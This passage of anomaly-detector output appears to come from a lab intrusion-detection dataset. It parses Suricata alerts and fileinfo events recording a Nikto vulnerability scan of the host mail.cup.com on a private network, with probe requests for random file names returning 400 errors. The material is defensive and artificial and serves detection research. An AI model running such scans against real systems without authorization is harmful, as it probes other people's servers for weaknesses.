1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant 
character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46800, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.186320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46800 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cfg", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.186581, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": 
"\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cfg\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cfg", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", 
"/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46800, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": 
"TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1239879732876050,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1239879732876050, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.186581+0000\",\"flow_id\":1239879732876050,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46800,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cfg\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cfg\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 
192.168.10.238:46802 -> 192.168.10.154:80", "/parser/model/time": 1583349514.188797, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46802, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.188797 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46802 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.iso8859-2", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.189008, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":964576624172563,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) 
(Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", 
"/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": 
",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46802, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":964576624172563,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 964576624172563, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", 
"/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80", "/parser/model/time": 1583349514.192062, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46804, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", 
"/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.php3+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.192275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", 
"/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": 
"\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46804, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1233325612787490, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 